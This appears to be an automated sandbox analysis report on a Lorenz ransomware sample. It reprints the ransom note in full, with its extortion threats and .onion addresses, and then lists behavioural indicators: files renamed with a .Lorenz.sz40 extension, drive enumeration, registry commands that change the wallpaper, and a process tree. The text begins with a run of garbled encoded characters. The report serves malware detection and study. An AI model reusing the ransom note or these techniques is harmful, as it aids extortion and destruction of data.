CiiigAooooAXtRRSUAKaKKOgoADR2+tJSmgBKWkpaACuxtf+PWH/cX+VcdXY2v/HrD/uL/ACqZFRPP6KKKCgooooAKKKKAFHIxSUUvXnvQISiiigYUUUUALR2oooAKO1FHagAooooAKKKKYgpaSloAKKKKACiiigBaB6npQBQT6dKADqaDR2oFABRRR2oAKKKKACiiigBaKKBQAv8AD9aSlPWkoAKKKKAFpKXtSUAKKKKKBBRRRQAq9aSlHQmkoAKKKKAFooooA1fDk3l35iPSVcfiP8mqN/D9nvZouyscfTtTLaUwXEco6owNaviSIGWG6TlZV6/59qXUZjUUUUxBRRRQAtFFFABRRRQBr+Gv+P8Af/cNZlz/AMfMv++f51f8PTLFqIDnG9SoPvUeo6dcw3kgETurMSpUZ4NLqPoXdO/5F+8/H+VYdb6RNYeH5hP8ry9F781gUIGFLRRTEFFFFABRRRQAUUU6NDJIqLyWOBTEbVp/onh+aY8NMcD+X+NYlbWvuIYLayQ8IoJ/kP61i0kNhUu6FnXchVQuDtPJPrUVFAh6+X5bbg2/jaR0rV0zVEsrUh7c7SeGXufesenybQ21HLIOh6UDCaTzZnkxjcxOPSmUUUxBS0lLQAlLSUtABRRRQAUUUUAFL2pKWgAo7UGjtQAUUUUAFLSUtABRRRQIKKKKACiiigBR1pKUUlACig80dKKACg0UuCRntQAlFLwPejPoAKAAAnsaXB9vzpMk9TRQAuPcUY9xSUUALtPt+dGD6UlFABRS7j35+tHB9qACkpcYGaKAAetHUZooFACUpoPFB7UAJS0lLQAV2Nr/AMesP+4v8q4

Extracted

Path

C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

Ransom Note

[+] What happened? [+] Your files are downloaded, encrypted, and currently unavailable. You can check it. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you can't return your data(NEVER). [+] What should i do ? [+] To decrypt your files you need to buy our special software General - Decryptor. [+] How to buy General - Decryptor ? [+] Visit our web - site and follow the instructions on it. [+] What guarantees ? [+] It's just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. It's not in our interests. To check the ability of returning files, You should go to our website.There you can decrypt some files for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. After deadline well publish all the contents of your company to site and will send all information to your clients and mass media. You we will lose your time, data and reputation. [+] How to get access on website and contact us ? [+] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open a website specially designed for you: http://lorenzezzket6afhfqfjagefsrjn44edsgi26kq4sfhqjal6wyneh4yd.onion/ When you open our website, put the following data in the input form: Company Key:Vm1wR2FtVkhUWGxWYmxKVllUSm9jMVZyVm1GalZuQkZVMVJTVUZaVk5YVlZSbEYzVTNkdlBRbz0K c) Check our website with leaks: http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion !!! WARNING !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data.!!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere!!!

URLs

http://lorenzezzket6afhfqfjagefsrjn44edsgi26kq4sfhqjal6wyneh4yd.onion/

http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion

Signatures

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\AddClear.tiff.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\AddInvoke.raw.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\EnableDisable.png.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\ExpandPing.tif.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\RestartMove.tiff.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\WriteRegister.raw.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\AddJoin.png.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\CheckpointClose.raw.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\OptimizeStop.raw.Lorenz.sz40	audiodg.exe
File created	C:\Users\Admin\Pictures\UnlockRestore.png.Lorenz.sz40	audiodg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	audiodg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\R:	audiodg.exe
File opened (read-only)	\??\S:	audiodg.exe
File opened (read-only)	\??\W:	audiodg.exe
File opened (read-only)	\??\A:	audiodg.exe
File opened (read-only)	\??\E:	audiodg.exe
File opened (read-only)	\??\F:	audiodg.exe
File opened (read-only)	\??\K:	audiodg.exe
File opened (read-only)	\??\G:	audiodg.exe
File opened (read-only)	\??\J:	audiodg.exe
File opened (read-only)	\??\M:	audiodg.exe
File opened (read-only)	\??\N:	audiodg.exe
File opened (read-only)	\??\U:	audiodg.exe
File opened (read-only)	\??\X:	audiodg.exe
File opened (read-only)	\??\Z:	audiodg.exe
File opened (read-only)	\??\H:	audiodg.exe
File opened (read-only)	\??\I:	audiodg.exe
File opened (read-only)	\??\O:	audiodg.exe
File opened (read-only)	\??\P:	audiodg.exe
File opened (read-only)	\??\V:	audiodg.exe
File opened (read-only)	\??\Y:	audiodg.exe
File opened (read-only)	\??\B:	audiodg.exe
File opened (read-only)	\??\L:	audiodg.exe
File opened (read-only)	\??\Q:	audiodg.exe
File opened (read-only)	\??\T:	audiodg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h2x.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\rsod\office32ww.msi.16.x-none.boot.tree.dat.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_OEM_Perp-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\share_icons.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul-oob.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\TURABIAN.XSL.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\MSFT_PackageManagement.psm1.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\CHANGELOG.md.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_zh_CN.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-ma\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\7-Zip\Lang\es.txt.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\epl-v10.html.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jre1.8.0_66\Welcome.html.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_Trial-ppd.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-down_32.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\Toast.svg.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.scale-80.png.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	audiodg.exe
File created	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Functions\BreakAndContinue.Tests.ps1.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-ms.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\ui-strings.js.Lorenz.sz40	audiodg.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.Lorenz.sz40	audiodg.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\y7K0rN8INAtf.bmp	audiodg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe
Key created	\REGISTRY\USER\S-1-5-20\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop\Wallpaper = "C:\\Windows\\y7K0rN8INAtf.bmp"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
5684	WINWORD.EXE
5684	WINWORD.EXE
5832	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe
2496	audiodg.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe

Suspicious use of AdjustPrivilegeToken 42 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2084	WMIC.exe
Token: SeSecurityPrivilege	2084	WMIC.exe
Token: SeTakeOwnershipPrivilege	2084	WMIC.exe
Token: SeLoadDriverPrivilege	2084	WMIC.exe
Token: SeSystemProfilePrivilege	2084	WMIC.exe
Token: SeSystemtimePrivilege	2084	WMIC.exe
Token: SeProfSingleProcessPrivilege	2084	WMIC.exe
Token: SeIncBasePriorityPrivilege	2084	WMIC.exe
Token: SeCreatePagefilePrivilege	2084	WMIC.exe
Token: SeBackupPrivilege	2084	WMIC.exe
Token: SeRestorePrivilege	2084	WMIC.exe
Token: SeShutdownPrivilege	2084	WMIC.exe
Token: SeDebugPrivilege	2084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2084	WMIC.exe
Token: SeRemoteShutdownPrivilege	2084	WMIC.exe
Token: SeUndockPrivilege	2084	WMIC.exe
Token: SeManageVolumePrivilege	2084	WMIC.exe
Token: 33	2084	WMIC.exe
Token: 34	2084	WMIC.exe
Token: 35	2084	WMIC.exe
Token: 36	2084	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2084	WMIC.exe
Token: SeSecurityPrivilege	2084	WMIC.exe
Token: SeTakeOwnershipPrivilege	2084	WMIC.exe
Token: SeLoadDriverPrivilege	2084	WMIC.exe
Token: SeSystemProfilePrivilege	2084	WMIC.exe
Token: SeSystemtimePrivilege	2084	WMIC.exe
Token: SeProfSingleProcessPrivilege	2084	WMIC.exe
Token: SeIncBasePriorityPrivilege	2084	WMIC.exe
Token: SeCreatePagefilePrivilege	2084	WMIC.exe
Token: SeBackupPrivilege	2084	WMIC.exe
Token: SeRestorePrivilege	2084	WMIC.exe
Token: SeShutdownPrivilege	2084	WMIC.exe
Token: SeDebugPrivilege	2084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2084	WMIC.exe
Token: SeRemoteShutdownPrivilege	2084	WMIC.exe
Token: SeUndockPrivilege	2084	WMIC.exe
Token: SeManageVolumePrivilege	2084	WMIC.exe
Token: 33	2084	WMIC.exe
Token: 34	2084	WMIC.exe
Token: 35	2084	WMIC.exe
Token: 36	2084	WMIC.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
5832	WINWORD.EXE
5832	WINWORD.EXE
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe
3428	msedge.exe

Suspicious use of SetWindowsHookEx 24 IoCs

pid	Process
5684	WINWORD.EXE
5832	WINWORD.EXE
5684	WINWORD.EXE
5832	WINWORD.EXE
5684	WINWORD.EXE
5832	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5832	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5832	WINWORD.EXE
5832	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE
5684	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 1660	2496	audiodg.exe	87
PID 2496 wrote to memory of 1660	2496	audiodg.exe	87
PID 2496 wrote to memory of 1660	2496	audiodg.exe	87
PID 1660 wrote to memory of 3596	1660	cmd.exe	88
PID 1660 wrote to memory of 3596	1660	cmd.exe	88
PID 1660 wrote to memory of 3596	1660	cmd.exe	88
PID 2496 wrote to memory of 4816	2496	audiodg.exe	89
PID 2496 wrote to memory of 4816	2496	audiodg.exe	89
PID 2496 wrote to memory of 4816	2496	audiodg.exe	89
PID 4816 wrote to memory of 3536	4816	cmd.exe	90
PID 4816 wrote to memory of 3536	4816	cmd.exe	90
PID 4816 wrote to memory of 3536	4816	cmd.exe	90
PID 2496 wrote to memory of 2704	2496	audiodg.exe	91
PID 2496 wrote to memory of 2704	2496	audiodg.exe	91
PID 2496 wrote to memory of 2704	2496	audiodg.exe	91
PID 2704 wrote to memory of 2484	2704	cmd.exe	92
PID 2704 wrote to memory of 2484	2704	cmd.exe	92
PID 2704 wrote to memory of 2484	2704	cmd.exe	92
PID 2496 wrote to memory of 2628	2496	audiodg.exe	93
PID 2496 wrote to memory of 2628	2496	audiodg.exe	93
PID 2496 wrote to memory of 2628	2496	audiodg.exe	93
PID 2628 wrote to memory of 2464	2628	cmd.exe	94
PID 2628 wrote to memory of 2464	2628	cmd.exe	94
PID 2628 wrote to memory of 2464	2628	cmd.exe	94
PID 2496 wrote to memory of 4200	2496	audiodg.exe	95
PID 2496 wrote to memory of 4200	2496	audiodg.exe	95
PID 2496 wrote to memory of 4200	2496	audiodg.exe	95
PID 4200 wrote to memory of 244	4200	cmd.exe	96
PID 4200 wrote to memory of 244	4200	cmd.exe	96
PID 4200 wrote to memory of 244	4200	cmd.exe	96
PID 2496 wrote to memory of 216	2496	audiodg.exe	97
PID 2496 wrote to memory of 216	2496	audiodg.exe	97
PID 2496 wrote to memory of 216	2496	audiodg.exe	97
PID 216 wrote to memory of 208	216	cmd.exe	98
PID 216 wrote to memory of 208	216	cmd.exe	98
PID 216 wrote to memory of 208	216	cmd.exe	98
PID 2496 wrote to memory of 4996	2496	audiodg.exe	99
PID 2496 wrote to memory of 4996	2496	audiodg.exe	99
PID 2496 wrote to memory of 4996	2496	audiodg.exe	99
PID 4996 wrote to memory of 2084	4996	cmd.exe	101
PID 4996 wrote to memory of 2084	4996	cmd.exe	101
PID 4996 wrote to memory of 2084	4996	cmd.exe	101
PID 3428 wrote to memory of 7880	3428	msedge.exe	129
PID 3428 wrote to memory of 7880	3428	msedge.exe	129
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130
PID 3428 wrote to memory of 7904	3428	msedge.exe	130

C:\Users\Admin\AppData\Local\Temp\audiodg.exe
"C:\Users\Admin\AppData\Local\Temp\audiodg.exe"
1⤵
- Modifies extensions of user files
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1660
- - C:\Windows\SysWOW64\reg.exe
